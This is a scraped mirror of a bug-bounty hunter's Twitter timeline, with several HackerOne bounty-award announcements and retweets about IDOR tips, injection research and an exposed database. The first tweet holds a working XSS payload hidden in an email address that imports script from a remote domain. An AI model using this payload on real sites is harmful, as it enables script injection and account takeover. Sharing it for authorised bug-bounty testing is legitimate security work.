Tabassum (@ehtabbu) Twitter Tweets • TwiCopy

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

thumb_up_off_alt821

chat_bubble_outline8

repeat240

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $650 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt246

chat_bubble_outline14

repeat5

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $200 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt183

chat_bubble_outline9

repeat1

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $200 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt194

chat_bubble_outline10

repeat2

shareShare

Intigriti

@intigriti

a year ago

This is the thread I wish someone created for me when I started participating in bug bounty! 😅 Not everyone shares these methods... but Here are a few tips to help you identify & exploit more IDOR vulnerabilities! 🤑 🧵 👇

thumb_up_off_alt125

chat_bubble_outline3

repeat28

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded $250 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt173

chat_bubble_outline9

repeat1

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $500 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt249

chat_bubble_outline16

repeat4

shareShare

Critical Thinking - Bug Bounty Podcast

@ctbbpodcast

a year ago

Frans Rosen was on the pod last week and dropped some mind-bending X-Correlation Injection research on us. Including these gems on how to test for it... 1/7

thumb_up_off_alt300

chat_bubble_outline4

repeat79

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $300 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt192

chat_bubble_outline11

repeat5

shareShare

Tabassum

@ehtabbu

a year ago

Yay, I was awarded a $1,000 bounty on HackerOne! hackerone.com/ehtabbu #TogetherWeHitHarder #bugbounty #cybersecurity #infosec

thumb_up_off_alt346

chat_bubble_outline15

repeat39

shareShare

Nagli

@galnagli

9 months ago

Critical vulnerabilities doesn't have to be complex or have a CVE - DeepSeek publicly exposed their internal ClickHouse database to the world, without any authentication at all, and leaked sensitive data. No one is safe from security mistakes, follow along to learn more 🧵

Critical vulnerabilities doesn't have to be complex or have a CVE - <a href="/deepseek_ai/">DeepSeek</a> publicly exposed their internal ClickHouse database to the world, without any authentication at all, and leaked sensitive data.

No one is safe from security mistakes, follow along to learn more 🧵

thumb_up_off_alt2,2K

chat_bubble_outline46

repeat383

shareShare

Tabassum

Tabassum

Tabassum

Tabassum

Nithin 🦹‍♂️

Tabassum

Tabassum

Tabassum

zseano

Tabassum

Tabassum

Tabassum

Intigriti

Tabassum

Tabassum

Critical Thinking - Bug Bounty Podcast

Tabassum

Tabassum

Nagli